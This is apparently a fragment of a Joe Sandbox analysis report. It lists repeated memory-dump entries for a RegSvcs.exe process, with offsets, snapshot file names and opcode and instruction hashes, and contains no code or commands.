                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cdfec89ecf4d227c2e3f2741df1fca2c4e7a0756e2f1ba050c9a008d3bdc9887
                                                        • Instruction ID: e80b9cbb32ce7aa80f269217a2acaa4f8c5de131eb2df65f765f3a476441bad2
                                                        • Opcode Fuzzy Hash: cdfec89ecf4d227c2e3f2741df1fca2c4e7a0756e2f1ba050c9a008d3bdc9887
                                                        • Instruction Fuzzy Hash: 3DB002747054005B8748D65DD951515A7D29BC9215728C4AD641DC7355DE22DD039644
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800981439.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_2d70000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d66b19ad16712863fba74449b4fadaf0c960a3bb725e9cd486d36cccf7c5e108
                                                        • Instruction ID: 7466f531a8316ff5d5311290b9e55ff95e7d15031bca353cc6ced3d22d510959
                                                        • Opcode Fuzzy Hash: d66b19ad16712863fba74449b4fadaf0c960a3bb725e9cd486d36cccf7c5e108
                                                        • Instruction Fuzzy Hash: ABB0015052E6C08FDB53677958BA698BFF09C9710030E8AEBC0D98F0B7C455942AD75A
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814644805.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                        • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                                        • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                        • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814644805.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                        • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                                        • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                        • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814644805.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                        • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                                        • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                        • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814644805.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                        • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                                        • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                        • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3817785560.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_61f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ae6db87710b86eeec76e9c722d13ac5584174c3e3746f66327433d2f97e75791
                                                        • Instruction ID: cd9490486b83e409a74776422a0729e1dede43c2e8550bd580bf8396d3015b37
                                                        • Opcode Fuzzy Hash: ae6db87710b86eeec76e9c722d13ac5584174c3e3746f66327433d2f97e75791
                                                        • Instruction Fuzzy Hash: 49B012320050104BD200CF04CC4A347B390EF10300F2504588C80AF252C235E45D4780
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3817785560.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_61f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                        • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                                        • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                        • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3817785560.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_61f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                        • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                                        • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                        • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                        • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                                        • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                        • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                        • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                                        • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                        • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                        • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                                        • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                        • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                        • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                                        • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                        • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814867785.00000000055D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                        • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                                        • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                        • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b65c1f5d651abbbac14c876bd04934164ad8b5a5ac8fe093e571034175a2a6ea
                                                        • Instruction ID: 6b76f7bc1a3d56ba9cb71e05826fecc2e18fe3f579d9b2e1fd3967336540e8ba
                                                        • Opcode Fuzzy Hash: b65c1f5d651abbbac14c876bd04934164ad8b5a5ac8fe093e571034175a2a6ea
                                                        • Instruction Fuzzy Hash: A290023148AA0D8B468127957509956775CD5445157801451A50DC1A016A6568215695
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 98bcad5130518089ef5c87f1ee038954e3932f0bfd532335ebbb374924897f51
                                                        • Instruction ID: a297ca4817b7e22b3beeddb5169f9f4285b75bcd38b73f55090399b53afb0bff
                                                        • Opcode Fuzzy Hash: 98bcad5130518089ef5c87f1ee038954e3932f0bfd532335ebbb374924897f51
                                                        • Instruction Fuzzy Hash: 7690223000030C8B82003380300C000330CA0002023C00000A00EC00002A00200003A0
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                                                        • Instruction ID: 2108930940694c1c8b8ad4272d9396267f2db374b9021a0985f6588530823504
                                                        • Opcode Fuzzy Hash: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                                                        • Instruction Fuzzy Hash: 6BA002742010009BC644DB54C991814F761EFC5219728C4DDA8198B256CF33ED03DA40